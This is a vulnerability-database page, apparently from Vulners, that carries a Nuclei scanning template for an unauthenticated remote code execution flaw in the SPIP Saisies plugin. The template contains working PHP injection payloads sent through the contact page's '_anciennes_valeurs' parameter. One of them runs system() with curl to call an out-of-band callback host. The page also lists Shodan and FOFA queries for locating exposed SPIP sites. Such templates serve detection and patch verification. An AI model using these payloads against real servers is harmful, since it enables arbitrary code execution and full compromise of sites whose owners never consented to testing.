Lucene search
K

SPIP Saisies - Remote Code Execution

πŸ—“οΈΒ 05 Jul 2026Β 03:01:21Reported byΒ ProjectDiscoveryTypeΒ 
nuclei
Β nuclei
πŸ”—Β github.comπŸ‘Β 6Β Views

SPIP Saisies plugin RCE in versions 5.4.0 and 5.11.0; unauthenticated remote code execution. Update to 5.11.1.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-71243
19 Feb 202614:58
–attackerkb
GithubExploit
Exploit for CVE-2025-71243
19 Feb 202616:13
–githubexploit
Circl
CVE-2025-71243
19 Feb 202616:31
–circl
CNNVD
SPIP 代码注ε…₯漏洞
19 Feb 202600:00
–cnnvd
CVE
CVE-2025-71243
19 Feb 202614:58
–cve
Cvelist
CVE-2025-71243 SPIP Saisies Plugin < 5.11.1 Remote Code Execution
19 Feb 202614:58
–cvelist
Metasploit
SPIP Saisies Plugin Unauthenticated RCE
9 Mar 202618:57
–metasploit
NVD
CVE-2025-71243
19 Feb 202616:27
–nvd
Packet Storm
πŸ“„ SPIP Saisies 5.11.0 Remote Code Execution
24 Feb 202600:00
–packetstorm
Packet Storm
πŸ“„ SPIP Saisies 5.11.0 Remote Code Execution
24 Feb 202600:00
–packetstorm
Rows per page
id: CVE-2025-71243

info:
  name: SPIP Saisies - Remote Code Execution
  author: omarkurt
  severity: critical
  description: |
    SPIP Saisies plugin 5.4.0 through 5.11.0 contains a remote code execution caused by an unspecified flaw, letting attackers execute arbitrary code on the server, exploit requires no special conditions.
  remediation: |
    Update to version 5.11.1 or later.
  impact:
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  reference:
    - https://vulnerability.circl.lu/vuln/cve-2025-71243
    - https://chocapikk.com/posts/2026/spip-saisies-rce/
    - https://github.com/Chocapikk/CVE-2025-71243
    - https://vulnerabletarget.com/VT-2025-71243
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-71243
    epss-score: 0.05126
    epss-percentile: 0.9137
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 3
    vendor: spip
    product: saisies
    shodan-query: 'http.html:"SPIP"'
    fofa-query: 'app="SPIP"'
  tags: cve,cve2025,spip,rce,oast,vkev

variables:
  rce_payload: "x'/><?php echo md5('{{randstr}}'); ?><input value='x"
  oob_payload: "x'/><?php gethostbyname('{{interactsh-url}}'); ?><input value='x"
  oob_curl: "x'/><?php system('curl+-s+{{interactsh-url}}'); ?><input value='x"

flow: http(1) && (http(2) || http(3) || http(4))

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Composed-By: SPIP")'
          - 'contains(header, "X-Spip-Cache:")'
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(rce_payload)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{md5(randstr)}}")'
          - 'status_code == 200'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_payload)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_curl)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ceacaa1afed50aa38654b94b926d630cbcb002e66fa1ee6e4ed629fec80f6f36022100eed5f9d0a85515e2dcb9eae3084cb351dfc52bb137aa9fabe464d0104bfafb3b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Feb 2026 18:28Current
6.9Medium risk
Vulners AI Score6.9
CVSS 49.3
CVSS 3.19.8
EPSS0.05126
SSVC
6